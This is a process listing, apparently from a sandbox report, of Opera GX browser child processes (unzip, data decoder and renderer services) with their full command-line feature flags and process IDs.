C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=8604,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=8028 /prefetch:82⤵PID:2536
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=6724,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=5852 /prefetch:82⤵PID:732
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=8544,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=8492 /prefetch:82⤵PID:876
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=8600,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=8580 /prefetch:82⤵PID:1508
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=7084,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=6904 /prefetch:82⤵PID:3372
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=6768,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=6908 /prefetch:82⤵PID:5792
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=6896,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=8608 /prefetch:82⤵PID:5932
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=8572,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7392 /prefetch:82⤵PID:8064
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=6188,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=3752 /prefetch:82⤵PID:4216
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=5800,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=3720 /prefetch:82⤵PID:7524
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=7328,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7104 /prefetch:82⤵PID:3744
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --extension-process --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --field-trial-handle=8580,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=6072 /prefetch:22⤵PID:5184
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --extension-process --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --field-trial-handle=6064,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7124 /prefetch:22⤵PID:7156
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --extension-process --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --field-trial-handle=7724,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7532 /prefetch:22⤵PID:5040
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --field-trial-handle=6156,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=6928 /prefetch:12⤵PID:348
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --field-trial-handle=8036,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7676 /prefetch:12⤵PID:6828
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --field-trial-handle=5008,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7444 /prefetch:12⤵PID:7064
-
-
